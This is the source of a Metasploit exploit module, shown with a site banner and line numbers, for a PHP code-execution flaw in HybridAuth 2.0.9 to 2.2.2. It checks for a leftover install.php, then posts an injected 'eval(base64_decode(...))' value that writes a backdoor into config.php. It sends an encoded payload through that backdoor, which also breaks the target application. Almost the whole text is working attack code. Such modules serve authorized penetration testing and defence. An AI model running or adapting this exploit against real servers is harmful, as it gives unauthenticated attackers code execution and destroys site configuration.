Real-time collaboration for Jupyter Notebooks, Linux Terminals, LaTeX, VS Code, R IDE, and more,
all in one place.

1
##
2
# This module requires Metasploit: https://metasploit.com/download
3
# Current source: https://github.com/rapid7/metasploit-framework
4
##
5

6
class MetasploitModule < Msf::Exploit::Remote
7
  Rank = ManualRanking # application config.php is overwritten
8

9
  include Msf::Exploit::Remote::HttpClient
10

11
  def initialize(info = {})
12
    super(update_info(info,
13
      'Name'           => 'HybridAuth install.php PHP Code Execution',
14
      'Description'    => %q{
15
          This module exploits a PHP code execution vulnerability in
16
        HybridAuth versions 2.0.9 to 2.2.2. The install file 'install.php'
17
        is not removed after installation allowing unauthenticated users to
18
        write PHP code to the application configuration file 'config.php'.
19

20
        Note: This exploit will overwrite the application configuration file
21
        rendering the application unusable.
22
      },
23
      'License'        => MSF_LICENSE,
24
      'Author'         =>
25
        [
26
          'Pichaya Morimoto', # Discovery and PoC
27
          'bcoles' # Metasploit
28
        ],
29
      'References'     =>
30
        [
31
          ['EDB', '34273'],
32
          ['OSVDB','109838']
33
        ],
34
      'Arch'           => ARCH_PHP,
35
      'Platform'       => 'php',
36
      'Targets'        =>
37
        [
38
          # Tested:
39
          # HybridAuth versions 2.0.9, 2.0.10, 2.0.11, 2.1.2, 2.2.2 on Apache/2.2.14 (Ubuntu)
40
          ['HybridAuth version 2.0.9 to 2.2.2 (PHP Payload)', {}]
41
        ],
42
      'Privileged'     => false,
43
      'DisclosureDate' => '2014-08-04',
44
      'DefaultTarget'  => 0))
45

46
    register_options(
47
      [
48
        OptString.new('TARGETURI', [true, 'The base path to HybridAuth library', '/hybridauth/'])
49
      ])
50
  end
51

52

53
  #
54
  # Check:
55
  # * install.php exists
56
  # * config.php is writable
57
  # * HybridAuth version is 2.0.9 to 2.0.11, 2.1.x, or 2.2.0 to 2.2.2
58
  #
59
  def check
60
    res = send_request_cgi 'uri' => normalize_uri(target_uri.path, 'install.php')
61
    if !res
62
      vprint_error "Connection failed"
63
      return Exploit::CheckCode::Unknown
64
    elsif res.code == 404
65
      vprint_error "Could not find install.php"
66
    elsif res.body =~ />([^<]+)<\/span> must be <b >WRITABLE</
67
      vprint_error "#{$1} is not writable"
68
    elsif res.body =~ />HybridAuth (2\.[012]\.[\d\.]+(-dev)?) Installer</
69
      version = res.body.scan(/>HybridAuth (2\.[012]\.[\d\.]+(-dev)?) Installer</).first.first
70
      vprint_status "Found version: #{version}"
71
      if version =~ /^2\.(0\.(9|10|11)|1\.[\d]+|2\.[012])/
72
        return Exploit::CheckCode::Vulnerable
73
      else
74
        vprint_error "HybridAuth version #{version} is not vulnerable"
75
      end
76
    end
77
    Exploit::CheckCode::Safe
78
  end
79

80
  #
81
  # Exploit
82
  #
83
  def exploit
84
    # check vuln
85
    if check != Exploit::CheckCode::Vulnerable
86
      fail_with Failure::NotVulnerable, "#{peer} - Target is not vulnerable"
87
    end
88

89
    # write backdoor
90
    print_status "Writing backdoor to config.php"
91
    payload_param = rand(1000)
92
    res = send_request_cgi(
93
      'method' => 'POST',
94
      'uri'    => normalize_uri(target_uri.path, 'install.php'),
95
      'data'   => "OPENID_ADAPTER_STATUS=eval(base64_decode($_POST[#{payload_param}])))));/*"
96
    )
97
    if !res
98
      fail_with Failure::Unknown, "#{peer} - Connection failed"
99
    elsif res.body =~ /Installation completed/
100
      print_good "Wrote backdoor successfully"
101
    else
102
      fail_with Failure::UnexpectedReply, "#{peer} - Coud not write backdoor to 'config.php'"
103
    end
104

105
    # execute payload
106
    code = Rex::Text.encode_base64(payload.encoded)
107
    print_status "Sending payload to config.php backdoor (#{code.length} bytes)"
108
    res = send_request_cgi({
109
      'method' => 'POST',
110
      'uri'    => normalize_uri(target_uri.path, 'config.php'),
111
      'data'   => "#{payload_param}=#{code}"
112
    }, 5)
113
    if !res
114
      print_warning "No response"
115
    elsif res.code == 404
116
      fail_with Failure::NotFound, "#{peer} - Could not find config.php"
117
    elsif res.code == 200 || res.code == 500
118
      print_good "Sent payload successfully"
119
    end
120

121
    # remove backdoor
122
    print_status "Removing backdoor from config.php"
123
    res = send_request_cgi(
124
      'method' => 'POST',
125
      'uri'    => normalize_uri(target_uri.path, 'install.php'),
126
      'data'   => 'OPENID_ADAPTER_STATUS='
127
    )
128
    if !res
129
      print_error "Connection failed"
130
    elsif res.body =~ /Installation completed/
131
      print_good "Removed backdoor successfully"
132
    else
133
      print_warning "Could not remove payload from config.php"
134
    end
135
  end
136
end
137

138